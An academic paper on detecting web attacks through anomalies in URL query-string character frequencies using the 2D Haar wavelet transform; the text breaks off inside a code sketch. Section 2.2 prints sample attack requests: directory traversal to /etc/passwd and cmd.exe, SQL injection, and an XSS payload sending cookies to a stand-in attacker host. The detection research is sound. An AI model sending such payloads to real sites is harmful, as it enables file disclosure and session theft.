

Int. J. Inf. Secur. DOI 10.1007/s10207-015-0276-y

REGULAR CONTRIBUTION

URL query string anomaly sensor designed with the bidimensional Haar wavelet transform

Alice Kozakevicius · Cristian Cappo · Bruno A. Mozzaquatro · Raul Ceretta Nunes · Christian E. Schaerer

© Springer-Verlag Berlin Heidelberg 2015

Abstract In this paper, the 2D Haar wavelet transform is the proposed analysis technique for HTTP traffic data. Web attacks are detected by two threshold operations applied to the wavelet coefficients of the 2D transform: one based on their median and the other on the best approximation method. The two proposed algorithms are validated through an extensive number of simulations, including comparisons with well-established techniques, confirming the effectiveness of the designed sensor.

Keywords Anomaly detector · 2D Haar wavelet transform · Thresholding · Best approximation method

1 Introduction

Attack detection mechanisms for web-based applications have recently received considerable attention, especially intrusion detection systems (IDS) that monitor HTTP-related activities [17,21,23,33,37]. This is mainly due to the increasing role that these applications are playing in society, as well as the lack of adequate techniques for debugging their possible vulnerabilities.

A. Kozakevicius · B. A. Mozzaquatro · R. C. Nunes
Technology Center, Federal University of Santa Maria, Av. Roraima, 1000, Santa Maria, RS 97105-900, Brazil
e-mail: [email protected]

B. A. Mozzaquatro
e-mail: [email protected]

R. C. Nunes
e-mail: [email protected]

C. Cappo (B) · C. E. Schaerer
Polytechnic School, National University of Asunción, San Lorenzo, Paraguay
e-mail: [email protected]

C. E. Schaerer
e-mail: [email protected]

Attacks attempt to exploit vulnerabilities either to violate the system security or to affect its availability [10]. An analysis of the common vulnerabilities and exposures (CVE) repository [41], as described in [34], shows that web-related security flaws account for more than 49 % of the total number of reported vulnerabilities from 1999 to 2009. The CVE repository contains only known application vulnerabilities; therefore, the number of vulnerabilities grows further when the custom-developed web applications built by organizations are also considered.

The design of an efficient IDS contributes to maintaining service availability, allowing quick responses to attacks, for instance, changing rules in firewalls. According to [1], an IDS can be seen as part of a fault prevention mechanism that helps to attain dependability and security in the analyzed systems. In this sense, there are two IDS approaches for protecting computer systems [20]: approaches based on signatures and anomaly-based ones.

The main difference between them lies in the assumption of previous knowledge about anomaly patterns. Signature-based methods identify attacks through a previously established signature analysis, which considers prior knowledge of the attack patterns. For the anomaly-based approach, on the other hand, this assumption is no longer made. The analysis is based on the observation of any substantial variation of a specific characteristic with respect to the commonly determined behavior, which is usually determined through machine learning or statistical techniques.

Signature-based approaches have the advantage that known attacks can be reliably detected with a low false-positive rate. However, they have two major drawbacks: They are only able to detect attacks with known patterns, and they require extensive management and maintenance of the signature databases in order to provide reliable detections. As a consequence, they leave the system wide open to the so-called zero-day attacks, for which neither pattern signatures nor variations of known attacks (polymorphic attacks) are available. Note that for an attack to proceed, it only takes one outdated signature [23].

Anomaly-based detection has been explored as an alternative approach because it can potentially detect novel attacks [17,21,37,44], as well as capture patterns that do not match any well predefined or standard behavior [3]. Thus, in the context of web-based applications, the adoption of an approach of this type has the following advantages: (a) no requirement of a priori knowledge of the web application, (b) capacity of self-adaptation to periodic maintenance of the web applications in focus, (c) capacity to detect polymorphic and unknown attacks and (d) ability to protect custom-developed web applications.

Code or content injection is one of the most explored actions to attack web applications. SQL injection and cross-site scripting (XSS) attacks are two examples of it. As a consequence of these malicious insertions, some HTTP requests can present anomalies in their character distribution. This paper explores the variations on the URL query string (the value of the query component in the HTTP URL), which is the target of the large majority of web attacks [29,40]. These kinds of attacks can cause a significant alteration of the character distribution in the URL query string. An example is the Directory Traversal attack, which is characterized by a large quantity of "." or "/" characters in relation to the quantity of all other remaining characters [33]. This attack attempts to gain access to files, directories, and commands that potentially reside outside the web document root directory.

In the context of web IDS, some approaches were proposed for the analysis of the URL query string character distribution [19,21,38]. A common feature of them is the dependency on statistical measures of standard behaviors, usually referred to as the normal (usual) profile, which are built based on a data set without anomalies (training data). Their generation step is, therefore, referred to as the training phase [30]. In an anomaly detection system, however, obtaining the normal profile is a challenge [18], mainly because of the difficulty of acquiring attack-free training data that can represent all real activities.

When considering the usage of a normal profile, the anomaly detection algorithms can operate in three modes [3]: supervised, semi-supervised and unsupervised. Supervised anomaly detection assumes availability of the training as well as the anomaly data sets. In the semi-supervised anomaly detection mode, only the training data set is available. Finally, the unsupervised anomaly detection mode does not require any training data set.

This paper presents an unsupervised anomaly detection algorithm for the URL query string based on the bidimensional Haar wavelet transform. The wavelet transform allows the extraction of information from the analyzed data at different resolution levels, independently of any other data contained in the system [27]. As a result, no training phase is required, avoiding any kind of previous knowledge of data sets without attacks. To the best of the authors' knowledge, there is so far no available unsupervised anomaly algorithm that searches for attacks in URL query strings.

The one-dimensional wavelet transform provides two sets of coefficients at each level of factorization: the scaling and the wavelet ones. Scaling coefficients represent mean trends of the original data. The wavelet coefficients capture all variations and perturbations with respect to this trend contained in the data at each resolution level of the transform. As a consequence of its definition, one of the most important properties of the wavelet transform is its extreme sensitivity in capturing non-smooth characteristics of the data such as noise, jumps and spikes. This property turns wavelet transforms into a promising tool for the detection of outliers [13] for many kinds of input data.

The one-dimensional wavelet transform has been successfully used as an efficient anomaly recognition tool in network IDS [14,25]. However, one-dimensional wavelet transforms are not adequate to detect URL query string anomalies. One main reason is that the detector needs to verify character frequency changes in one request and also, at the same time, in a set of many requests in order to identify which variations are significant.

The algorithms presented in this work explore the bidimensional Haar wavelet transform to allow the analysis of abrupt changes in different directions of a character-per-request matrix. The potential of the bidimensional Haar wavelet transform as an efficient tool for network data analysis was initially investigated in [28]. In that previous work, web attacks were detected through the truncation of the wavelet data representation, considering a hard threshold strategy [7] and simple choices for the threshold parameters. In the present work, this initial study is detailed further, and more robust strategies for the determination of the threshold values are proposed and investigated, since the threshold operation is one of the main ingredients of the wavelet attack analysis. Since the two-dimensional wavelet transform provides wavelet coefficients that capture data variations in three directions (vertical, horizontal and diagonal), the relevant aspect now is that the contribution of each of these three sets of wavelet coefficients is involved in the determination of suitable threshold values, allowing an increase in the rate of correct attack detections, as the numerical experiments will demonstrate. The other main contribution here with respect to the previous work is the design of a refinement step in our analysis algorithms, bringing more efficiency to the presented detection strategy.

The paper is organized as follows. The background of web attacks and the usual techniques used for their detection are reported in Sect. 2. In Sect. 3, character distribution characteristics are described. Plots in 2D and 3D are also presented in order to highlight the effects caused by malignant character insertions on HTTP requests. The features of the wavelet-based algorithms based on 1D and 2D transforms are presented and discussed in Sect. 4. Two important threshold operations for the wavelet coefficients are also presented at the end of Sect. 4, since they are responsible for the wavelet-based intrusion detection sensor proposed in Sect. 5. In Sect. 6, the two proposed wavelet-based algorithms for intrusion detection, taking into account the presented truncation strategies, are tested. The efficiency of the proposed 2D analysis is verified by comparisons between 1D and 2D formulations of the proposed sensor. In order to put the presented proposal in the context of other existing methodologies, an extensive number of numerical simulations and comparisons with well-established algorithms are made, whose results are summarized in tables presented in Sect. 7.

Final considerations with respect to related works are summarized in Sect. 8, and conclusions are presented in Sect. 9.

2 Detection and characteristics of web attacks

This section describes the anomaly-based detection techniques that have been used to detect web attacks related to injection-based techniques (Sect. 2.1). Some signatures of web attacks are also highlighted here to demonstrate the anomalous behavior commonly generated by them (Sect. 2.2). Discussing signatures is important to understand what we consider as an anomaly in our proposal and to learn how the attacks are performed.

2.1 Web detection techniques

Anomaly detection techniques are traditionally based on the assumption that attacks generate variations in the so-called normal (usual) behavior. Thus, a common strategy to detect anomalies consists in the definition of a normal profile; consequently, any observation that does not match the normal profile will be considered anomalous. The choice of the matching operation depends on the technique assumptions [3]. In the following, we describe the two main approaches used in web anomaly detection techniques.

2.1.1 Works based on character distribution

In this approach, anomalies are detected considering behavior analysis of the character (or byte) distribution. The basic hypothesis is that requests (e.g., HTTP requests) have a regular structure and an attack occurrence disturbs the character frequency distribution of requests. This approach is implemented in [19,21,22,24,38]. In all these references, the same statistical hypothesis test is used: the Pearson Chi-square goodness-of-fit test [31], which compares the character distribution of a normal profile with the current request. Other works have used different tools for determining similarity between distributions (e.g., in [44] the Mahalanobis distance [26] is considered).
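As an illustration of this kind of comparison, the minimal sketch below applies the Pearson Chi-square goodness-of-fit test to binned character counts. The six bins merely mimic the grouping idea of [21,24]; all the numbers are invented for the example and are not taken from any of the cited works.

from scipy.stats import chisquare

# Hypothetical binned character counts: expected frequencies come from a
# normal profile, observed ones from the current request. Both sums must match.
expected = [40, 25, 15, 10, 7, 3]
observed = [20, 18, 12, 9, 38, 3]   # one bin inflated by injected characters

stat, p_value = chisquare(f_obs=observed, f_exp=expected)
# A small p-value indicates that the request's character distribution
# deviates significantly from the normal profile.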

Kruegel et al. [24] applied the concept of anomaly search to the character distribution of the IP payload. Their model built a normal profile for each analyzed service using three measures of normality: the character frequency distribution, the request length (e.g., domain name length in DNS or URL length in HTTP) and the request type (e.g., in DNS: PTR, A, MX, SOA). In the case of the character frequency distribution, they group the relative frequencies of characters into six predefined bins. After this, these bins are sorted in decreasing order. The anomaly probability is obtained by a statistical hypothesis test. The final anomaly score is then obtained using a weighted sum of the results of the three measures. In [24], however, only DNS traffic was investigated. In a second work, Kruegel et al. [21] applied the same type of models to the URL string of each CGI script, and a normal profile was built for each web application.

In the case of the character distribution model, the same methodology presented in [24] is used for detecting anomalies. The final anomaly score is also obtained using a weighted sum of the anomaly probability of each model and then applying a threshold to consider a request anomalous or not. The character distribution model has shown effectiveness in detecting the majority of web attacks such as Directory Traversal, Buffer Overflow and XSS.

Variations of [21] in the use of character distribution models to detect attacks in web applications are presented in [19] and [38]. In [38], the same models used in [21] were presented but with a different grouping criterion for the character distribution model. More precisely, instead of using six bins, three bins were constructed: one for alphabetical characters, another for numbers and a third bin for special symbols. This approach reported better results with the proposed grouping.

Another way of grouping the data was presented in [19], considering a process named Yates' correction [45], where the number of bins was dynamically created. In [19], no sorting was applied to determine the bins. Then, the Pearson Chi-square test for comparing the character distribution was also considered. The authors claimed that this dynamical grouping did not lose the information structure of the request, because the relation between characters and their frequency was preserved, allowing the detection of more subtle attacks and specifically SQL injection attacks. Nevertheless, the grouping in [21] treated the character distribution in a very coarse way, missing important relationships between the characters, as pointed out in [44] and in [19].


Character distribution models were also used in the work named payload-based anomaly detector (PAYL) presented by Wang and Stolfo [44]. The presented detector inspected the payload of TCP requests in network traffic. The byte frequency distribution and the standard deviation of the application payloads of network services were computed and grouped by length. PAYL used a variation of the Mahalanobis distance (the simplified Mahalanobis distance) to detect the similarity between the byte distribution of the normal profile and the current payload. The Mahalanobis distance is a global anomaly detection method that determines the center of mass of the data μ and the variance of each dimension σi in the input space. In this case, each dimension corresponds to an ASCII character.
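A minimal sketch of such a distance computation is given below, assuming the simplified form sum_i |x_i − mean_i| / (std_i + alpha) over per-byte relative frequencies; the tiny 4-symbol alphabet, the profile values and the smoothing factor alpha are illustrative assumptions, not values from PAYL [44].

import numpy as np

def simplified_mahalanobis(x, mean, std, alpha=0.001):
    # Distance between a request's byte-frequency vector x and the profile
    # (mean, std); alpha avoids division by zero for constant dimensions.
    x, mean, std = (np.asarray(v, dtype=float) for v in (x, mean, std))
    return float(np.sum(np.abs(x - mean) / (std + alpha)))

# Hypothetical profile over a tiny 4-symbol alphabet instead of 256 bytes.
profile_mean = np.array([0.50, 0.30, 0.15, 0.05])
profile_std  = np.array([0.05, 0.04, 0.03, 0.01])
request_freq = np.array([0.20, 0.10, 0.10, 0.60])  # skewed by injected characters
print(simplified_mahalanobis(request_freq, profile_mean, profile_std))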

Character distribution was also explored in [18], where correlations among different features were considered, in this case the 256 ASCII characters of the first 150 bytes of the HTTP GET request. The algorithm computed the average frequency of each ASCII character, as well as the mean and variance. Afterwards, the correlations among the 256 ASCII characters were calculated, forming the Mahalanobis Distance Map (MDM) of requests (a matrix of 256 × 256). This map reflected the characteristics of the character frequencies and the relations between them. In order to detect anomalies, a weight factor was calculated between the MDM of normal requests and the MDM of the current request.

As pointed out in the above-mentioned works, the analysis of the character distribution is a valid approach to observe the anomalies caused by attacks. The difficulty lies in finding a precise and convenient way to compare the normal with the anomalous distributions.

Our proposed methodology is also based on the analysis of the character distributions, but with the main advantage of avoiding training phases based on the knowledge of an attack-free data set.

2.1.2 Works based on n-gram analysis

In contrast to individual characters, byte sequences reflect specific patterns of normal (usual) data and of data with attacks. These byte sequences can be represented by a fixed-length language model named n-grams [2]. An n-gram is simply a substring generated by sliding a window of length n across a string, which might be the whole request or part of it. The result is a set of strings of length n. A special case of n-gram analysis is the 1-gram, that is, the byte-level analysis, which was presented in the first part of this subsection. This technique was used initially in natural language processing (e.g., text categorization and classification [2,5]) and extensively applied in host intrusion detection systems [11,12] and later in network intrusion detection systems [32,43].
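For concreteness, a minimal sketch of n-gram extraction over a query string is given below; the sample query is invented for the example.

def ngrams(s, n):
    # All substrings of length n obtained by sliding a window over s.
    return {s[i:i + n] for i in range(len(s) - n + 1)}

# Hypothetical query string; its 3-grams form the feature set of the request.
query = "sessionid=12312312&username=Joe"
print(sorted(ngrams(query, 3)))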

In web IDS, n-gram analysis is explored in several works [16,23,37]. The idea behind the use of n-gram analysis is the detection of deviations in the regularity of the n-grams of HTTP requests. This regularity can be observed by analyzing only the presence or absence of n-grams in the analyzed request with respect to normal n-grams [16]. Furthermore, this analysis might include the relationships of one n-gram with respect to others [37]. That is, how likely is one n-gram to occur when other n-grams have been observed? This observation can possibly discriminate between valid n-grams, corresponding to normal data, and n-grams corresponding to anomalies.

In [16], to generate a measure of similarity or anomaly, the presence or absence of the request n-grams is compared with the set of learned n-grams obtained during the training phase. The detection model simply computed the ratio between the number of n-grams of the current request that belong to the set of normal n-grams and the total number of n-grams of the current request. A ratio close to unity indicates that the request is normal. In [23], the n-gram analysis was used as one of the anomaly detector models of a web application firewall. This model considers all possible n-grams over byte sequences S = {0, . . . , 255}^n and then defines the embedding function φ for a request value x such that φ(x) = (φ_s(x))_{s∈S} ∈ R^{|S|}, with φ_s(x) = b_s(x), where b_s(x) returns 1 if the n-gram s is contained in x and 0 otherwise. The detection is performed using the Euclidean distance between the resulting vector φ(x) and the vector μ, which is constructed from the training data as the arithmetic mean of the respective embedding vectors.
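The sketch below illustrates this binary n-gram embedding and the Euclidean-distance comparison; the tiny vocabulary and the training queries are invented for the example, whereas the model in [23] ranges over all n-grams observed in training.

import numpy as np

def binary_ngram_embedding(s, n, vocabulary):
    # phi(x): one component per n-gram in the vocabulary, set to 1 if the
    # n-gram occurs in s and 0 otherwise (the b_s(x) of the model in [23]).
    present = {s[i:i + n] for i in range(len(s) - n + 1)}
    return np.array([1.0 if g in present else 0.0 for g in vocabulary])

# Hypothetical tiny vocabulary and training queries, invented for illustration.
vocabulary = ["d=1", "id=", "ses", "use", "=Jo"]
training = ["sessionid=111&username=Joe", "sessionid=222&username=Ann"]
mu = np.mean([binary_ngram_embedding(q, 3, vocabulary) for q in training], axis=0)

x = binary_ngram_embedding("sessionid=333&username=<script>", 3, vocabulary)
score = np.linalg.norm(x - mu)  # Euclidean distance used for the decision
print(score)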

The use of n-grams for determining relationships among themselves was explored in [37] to model the string contained in the URL of the GET request and the message body of the POST HTTP request. A mixture of Markov chains was used to capture a representation not only of the content but also of the structure of the script argument string (the query string of the URL) by learning a proper distribution on the overlapping n-grams. The resulting method has a high detection accuracy for a variety of web-based attacks.

Finally, n-gram analysis enables the study of the behavior of HTTP requests by representing the data in a compact form and by allowing the recognition of relations among them. However, there are two main problems with n-gram analysis. One is the space required for representing all possible n-grams of the ASCII alphabet, and the other is the difficulty of determining an efficient method for correctly accessing the data structure that contains the normal n-grams in order to compare the current request against it.

The methodologies based on n-grams and on the normal distribution of characters enable the identification of anomalies in HTTP requests, which can be a consequence of code injection attacks. In the following, we describe the most common web attacks related to code injection that modify the URL query string.


2.2 Attacks in HTTP request: URL query string

Web-based facilities are designed to provide web page access, to allow multiple users to perform specific tasks and to provide web services, just to mention a few examples. The so-called normal (standard) HTTP requests present a similar structure in the same web application. However, in general, due to a lack of security-related internal procedures in the software development process, web applications may present several vulnerabilities [42].

In fact, new web application vulnerabilities are discovered each day, and this diversity of vulnerabilities is exploited by attackers to violate different security mechanisms that should be enforced by the application. Some of the violations can be observed as variations in the structure of normal requests [15].

Among the web attack possibilities, we have focused on attacks that insert malicious data into the URL query string [40]. Table 1 presents the most popular security risks during the year 2010 and shows that the query field of the request was one of the locations most explored by attackers. The attacks on the query can cause variations in the query character frequency, especially A1 (injection) and A2 (cross-site scripting). In fact, attacks A1 and A2 are the most prevalent in web security and are the main subject of this work.

Consider the well-known Directory Traversal attack, an instance of an injection attack (A1 in Table 1). This attack explores vulnerabilities in the validation process of data informed by users [33]. Its main goal is to defeat the access control to web server directories, allowing access to restricted files. Its signature is well known and uses a high quantity of "." and "/" characters (content injection). An example of its signature, used for reading the contents of the passwd file on a UNIX system, is shown as follows:

GET /page.php?p=../../../../../../../../etc/passwd%00

Table 1 OWASP top 10 web application security risks [29]

No.   Attack                                          Location
A1    Injection                                       Query
A2    Cross-site scripting (XSS)                      Query
A3    Broken authentication and session management    Query
A4    Insecure direct object references               Query
A5    Cross-site request forgery (CSRF)               Query
A6    Security misconfiguration                       –
A7    Insecure cryptographic storage                  Query
A8    Failure to restrict URL access                  Query
A9    Insufficient transport layer protection         –
A10   Unvalidated redirects and forwards              Query

Note that the Directory Traversal attack attempts to move outside of the web document root to get access to the system files. It succeeds because many web applications do not verify the location and content of the file requested on the web server [35]. A common technique used by attackers to hide it consists in encoding the URL characters as follows:

GET %47%45%54%20%2F%73%63%72%69%70%74%73%2F%2E%2E%2F%2E
%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%77%69%6E%6E
%74%2F%73%79%73%74%65%6D%33%32%2F%63%6D%64%2E%65%78%65
%3F%2F%63%20%64%69%72%20%48%54%54%50%2F%31%2E%30

Note, however, that decoding does not eliminate the character frequency variation. A similar behavior occurs in the Code Red attack (A1). This attack exploits a buffer overflow to cause a denial of service with a large number of characters in the HTTP query [4], as can be seen below with the "X" character injection.

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX(...)

These examples show injection contents that cause changes in the character frequency on URL queries.

Another way to exploit web application vulnerabilities through unusual characters consists in injecting code instead of content. For instance, the SQL injection (A1) web attack injects SQL code into URL queries to attempt prohibited access to databases. However, as shown through the example below, it also changes the common structure of the query and generates variations in the character frequency [9].

GET /page.php?p==%27/**/+union+/**/select/**/+1,2,3,version(),user(),6/**/--+

Cross-site scripting (XSS) is another very common web attack that exploits code injection. The goal is to inject a client-side script into the web server to change the behavior of the web site. In the following, we exemplify a normal GET request and a modified request that replaces the Joe username with a script that modifies the document.location attribute.

GET /index.php?sessionid=12312312&username=Joe

GET /index.php?sessionid=12312312&username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>

Similar to SQL injection, the XSS attack and its variations need to put additional information in the URL queries. This always implies variations in the frequency of characters, which might be captured by anomaly-based web detectors.

3 Character frequency distribution characteristics

This section presents and discusses the three-dimensional representation of the character frequencies from web requests, which will be further explored by the proposed methodology. This representation (ASCII character × character frequency × requests) allows one to understand how a web attack affects the character frequency and how it is translated into the request matrix. In order to explore the structural aspects involved in the analysis of the URL query string, graphics of the bidimensional representation (ASCII character × requests) are included, where the character frequency is plotted through its color intensity. Our analysis is made by considering a reference data set (without attacks) and its variations with one and two attacks, where the two types of considered attacks are the Directory Traversal attack and the XSS attack. The behavior of these attacks was discussed in Sect. 2.2.

Fig. 1 Example of HTTP request registered in the log file

Fig. 2 Input data matrix, containing the frequencies for each ASCII character (row) at each HTTP request (column)

Considering a web application named "page.php" that receives one parameter p, Fig. 1 exhibits the GET portion of the application HTTP requests, obtained from web server log files. In the figure, the URL query string is underlined, [IP] denotes the client IP address and [TS] the time stamp of the request.

The character frequency associated with the collected data (logs) is organized in the input data matrix. Figure 2 shows the matrix organization, where the rows are assigned to the 256 ASCII characters and the columns are reserved for the 256 HTTP requests taken into account. Note that the request set corresponds to the attack analysis window.
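A minimal sketch of how such a window matrix can be assembled from the logged query strings is given below; the helper name and the three-request window are illustrative assumptions, and a real analysis window holds 256 requests.

import numpy as np

def build_window_matrix(query_strings):
    # Input data matrix of Fig. 2: rows are the 256 ASCII/byte values,
    # columns are the requests of the window; entry (i, j) counts the
    # occurrences of character i in URL query string j.
    m = np.zeros((256, len(query_strings)))
    for j, query in enumerate(query_strings):
        for ch in query.encode("ascii", errors="replace"):
            m[ch, j] += 1
    return m

# Hypothetical window of three requests (invented for illustration).
window = ["p=products&id=17",
          "p=products&id=42",
          "p=../../../../etc/passwd%00"]
m = build_window_matrix(window)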

The analysis window used in this section was collected from the border of a real web server, and the data were carefully analyzed to remove any possible attack, producing a data set without attacks. The associated frequency distributions of the ASCII characters contained in the request window are shown in Fig. 3a. Its x axis contains the 256 HTTP requests, and the y axis contains the 256 ASCII character frequencies (frequency of occurrences). The corresponding bidimensional representation of the frequency intensities is also provided (b) for the same data set. Note that the characters of the URL query string are kept in a common region. For this particular window and application, the region includes the characters whose ASCII value is between 45 and 130. The plot is restricted to the range from 0 to 150 only for zoom purposes. In summary, this graphic shows: first, that for a single character, the difference in character frequency among various requests is quite regular (the color in Fig. 3b remains similar along the window horizontal lines); and second, that in requests to the same application, the frequency distribution of distinct characters remains stable.

Fig. 3 Data without attacks. a 3D representation; b 2D view with the frequency intensity scale

Fig. 4 Data with 1 attack: one Directory Traversal attack (A1). a 3D frequency representation; b 2D representation with the frequency intensity scale

Figure 4a shows the data set after the injection of a Directory Traversal (A1) attack that inserts the "../" string 9 times in the 25th URL request to get access to the root directory. Figure 4 uses a different scale than Fig. 3 in order to show the effect of the attack. Note that the number of "." and "/" characters (respectively, positions 46 and 47 in the ASCII table) increases significantly when compared to the usual request characters. This increment can also be observed in Fig. 4b at point A1, which corresponds to a large character frequency.

Injection-based attacks should generate behavior similar to that shown in Fig. 4. To demonstrate this characteristic behavior, a non-decoded XSS attack aimed at cookie stealing is considered, like the one presented in Sect. 2.2.

Fig. 5 Data with 2 attacks: one Directory Traversal attack (A1) and one XSS attack (A2). a 3D frequency representation; b 2D view with the frequency intensity scale

This attack injects a script containing lowercase letters (ASCII values from 97 to 122), dots and other ASCII characters, and it can be observed in Fig. 5. The points A1 and A2 indicate the columns of the modified requests, where A1 indicates the Directory Traversal attack and A2 indicates the XSS attack. Figure 5a shows the spikes, and Fig. 5b allows the identification of the columns/requests where the changes occur.

The examples presented in this section show the impact of injection-based web attacks on the character matrix of a web request window. Hence, it is possible to point out that this kind of attack changes the character frequency distribution, causing anomalous events in the matrix formed by request × character. These events are suitable for being detected by bidimensional transforms, as will be emphasized in the next sections.

4 Wavelet-based algorithms

Many wavelet families are available. However, in order to present the main ideas and to investigate their applicability for traffic analysis, we chose the Haar wavelet family for its simplicity in terms of implementation, direct application (even when boundary conditions have to be taken into account) and the possibility of having fast algorithms for both the one- and bidimensional discrete transforms. Another relevant advantage is that the localization of the significant data variations is better preserved by the Haar wavelet transform, since the transformation is based on simple mean computations between two consecutive neighbors.

The assumption behind the fast implementation of a 2D discrete wavelet transform is that the 2D wavelet family is obtained as a tensor product of 1D wavelet functions. For a complete mathematical discussion about wavelets, see [6]. A more intuitive explanation, including some interesting representations for the 2D Haar wavelets, is given in [39]. The algorithms implemented in this work for the fast bidimensional transform are based on the formulations proposed in [39].

A possible fast implementation applies the 1D wavelet transform first to each one of the input matrix rows and then performs the same one-dimensional transform on each one of the matrix columns [39]. In this sense, the 1D wavelet transform is formulated in Sect. 4.1, while a complete 2D algorithm is presented in Sect. 4.2. Finally, two very important operations are briefly pointed out in Sects. 4.3 and 4.4: the threshold operation and the best approximation method, which are responsible for the selection and truncation of the wavelet coefficients, allowing the identification of significant data variations. These operations are the core of our alarm detection system.

4.1 1D wavelet transform: TW1D

The pseudocodes of Algorithms 1 and 2 are presented to compute the one-dimensional discrete wavelet transform.

The first half of vector C′ stores the scaling coefficients, which are responsible for capturing the coarser information contained in the signal at each level. The second half of C′ contains the wavelet coefficients from the transformation. They capture all variations with respect to the coarser trend at each level.

The Haar transform is determined by the convolution of the signal with its corresponding filters of size two. The filters can be given in the standard form h = {1/2, 1/2}, g = {1/2, −1/2}, or in the normalized form h = {1/√2, 1/√2} for the scaling coefficients and g = {1/√2, −1/√2} for the wavelet coefficients computation. Here, we consider the normalized version, since it preserves the energy of the entire signal through the decomposition levels, avoiding any distortion of the wavelet coefficients caused by the scale.

Therefore, the Haar wavelet decomposition of a function at each level presents the data through piecewise constant functions (associated with the scaling coefficients) and a set of variations necessary to recover the original data. These variations are then represented by the wavelet coefficients.

Despite giving a simplified representation of the original signal, the 1D Haar wavelet transform efficiently captures data variations without losing the position in the signal where each variation occurs.

Note that the given algorithms execute the complete data decomposition, i.e., until only one element is contained in the coarsest representation level.

Nevertheless, the wavelet decomposition could also assume any other intermediate level as the coarsest one for the transformation, where the factorization can be ended, i.e., a partial decomposition. In fact, in many applications it might be useful to perform a partial decomposition, choosing the most convenient level to stop the factorization. Here, for the alarm generation, only one or two decomposition levels will be enough.


Algorithm 1: Decomposition
input : C : Array of data
output: C′ : Array of data
1  N ← |C|
2  C′ ← C
3  while N > 1 do
4      C′ ← DecompositionStep(C′)
5      N ← N/2
6  end
7  return C′

Algorithm 2: Decomposition step
input : C : Array of data
output: C′ : Array of data
1  N ← |C|
2  C′ ← 0
3  for i ← 1 to N/2 do
4      C′[i] ← (C[2i − 1] + C[2i]) / √2
5      C′[N/2 + i] ← (C[2i − 1] − C[2i]) / √2
6  end
7  return C′
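As a concrete illustration, a minimal NumPy sketch of Algorithms 1 and 2 is given below; restricting each step to the first N entries (which hold the scaling coefficients of the previous level) is made explicit here, and the sample row is invented.

import numpy as np

def decomposition_step(c):
    # One level of the normalized 1D Haar transform (Algorithm 2): the first
    # half of the output holds the scaling coefficients (pairwise sums / sqrt(2)),
    # the second half the wavelet coefficients (pairwise differences / sqrt(2)).
    c = np.asarray(c, dtype=float)
    half = c.size // 2
    out = np.empty_like(c)
    out[:half] = (c[0::2] + c[1::2]) / np.sqrt(2.0)
    out[half:] = (c[0::2] - c[1::2]) / np.sqrt(2.0)
    return out

def decomposition(c):
    # Complete 1D Haar decomposition (Algorithm 1): repeatedly transform the
    # first n entries until a single scaling coefficient remains.
    # The input length must be a power of two.
    c = np.asarray(c, dtype=float).copy()
    n = c.size
    while n > 1:
        c[:n] = decomposition_step(c[:n])
        n //= 2
    return c

# Example: one row of the character-per-request matrix (length 8 for brevity);
# the large wavelet coefficient marks the position of the abrupt change.
row = [2, 2, 3, 2, 2, 15, 2, 2]
print(decomposition(row))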

Fig. 6 TW1D by rows—one level decomposition. a o (ASCII = 111) character frequency per request, c scale coefficients, e wavelet coefficients. Corresponding zooms on b, d and f


In order to illustrate the different data behaviors according to the directions that are analyzed, Figs. 6 and 7 show the TW1D executed by rows and by columns, respectively.

In both figures, the scaling coefficients are represented by piecewise constant functions, while the wavelet coefficients represent the variations.

In Fig. 6a, the graph of the frequencies of the ASCII = 111 character per request is presented. In part (b), a zoom on the interval [200,255] is given. In part (c), the scaling coefficients are shown, and the corresponding zoom is given in Fig. 6d. Finally, the wavelet coefficients (e) and the corresponding zoom (f) are shown in Fig. 6.

Fig. 7 TW1D by columns—one level decomposition. a Character frequency for request number 10, c scale coefficients, e wavelet coefficients. Corresponding zooms on b, d and f


In Fig. 7, the graphs correspond to the TW1D applied to the character distribution of request number 10, meaning that the wavelet transform this time acts over the columns of the input matrix. It is possible to observe a completely different profile, since now it is evident that not all characters appear in request number 10. The zoom is now on the frequencies for ASCII values in the interval [40,120].

4.2 2D wavelet transform: TW2D

The fast algorithm for any bidimensional wavelet transform usually performs the one-dimensional wavelet transform as independent processes on each dimension (row and column) of the 2D input data. The order in which the operations are executed can generate different types of algorithms for the bidimensional transformation, i.e., producing different sets of scaling and wavelet coefficients. For more details in a very experimental approach, see [39].

In this work, the fast 2D Haar wavelet transform is obtained by the standard procedure, in which the 1D Haar wavelet transform is performed initially for all rows and then for all columns of the resultant matrix. Figure 8 illustrates this process for one complete level of transformation. When applying the 1D wavelet transform on the rows, the original data on each row is compressed [label (c)] and a set of wavelet coefficients [label (d)] is generated. The same occurs when applying the 1D wavelet transform on the columns, but this process is now performed considering the already transformed data. As a consequence, four distinct blocks of coefficients are generated: one representing information at a coarser level (cc), and three blocks representing the variations in three different directions (cd, dc, dd), as presented in Fig. 8.

Fig. 8 Matrix x[n][n] decomposition applying the bidimensional wavelet transform: the row transform produces the mean (c) and detail (d) halves, and the column transform splits them into the blocks (cc), (cd), (dc) and (dd)

When more levels are performed, only the block associated with the "mean of means" [block (cc) in Fig. 8] will be decomposed; i.e., only the scaling coefficients from the previously obtained level will be decomposed. The other three blocks, related to the wavelet coefficients, remain untouched. In Fig. 8, these blocks are labeled as (cd), (dc) and (dd). As a result, when the entire 2D wavelet transform is finally applied on the input matrix, not only the lines are automatically analyzed, but also the columns. And the variations among lines, columns and their combinations, translated into variations along the diagonals of the input matrix, are captured by the three blocks of wavelet coefficients generated by the bidimensional transform.
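A minimal NumPy sketch of this one-level, row-then-column procedure is shown below; the mapping of the two mixed blocks to the labels (cd) and (dc) follows the layout of Fig. 8 and should be taken as an assumption, and the 4 × 4 sample window is invented.

import numpy as np

def haar_step(c):
    # Normalized 1D Haar step: scaling coefficients first, details second.
    c = np.asarray(c, dtype=float)
    return np.concatenate([(c[0::2] + c[1::2]) / np.sqrt(2.0),
                           (c[0::2] - c[1::2]) / np.sqrt(2.0)])

def haar2d_one_level(m):
    # One level of the standard 2D Haar transform: 1D transform of every row,
    # then of every column of the result. Returns the four blocks of Fig. 8.
    m = np.asarray(m, dtype=float)
    rows_done = np.apply_along_axis(haar_step, 1, m)          # transform rows
    both_done = np.apply_along_axis(haar_step, 0, rows_done)  # then columns
    h = m.shape[0] // 2
    cc = both_done[:h, :h]  # means of means (coarse block)
    cd = both_done[:h, h:]  # details in one direction (assumed label, Fig. 8)
    dc = both_done[h:, :h]  # details in the other direction (assumed label)
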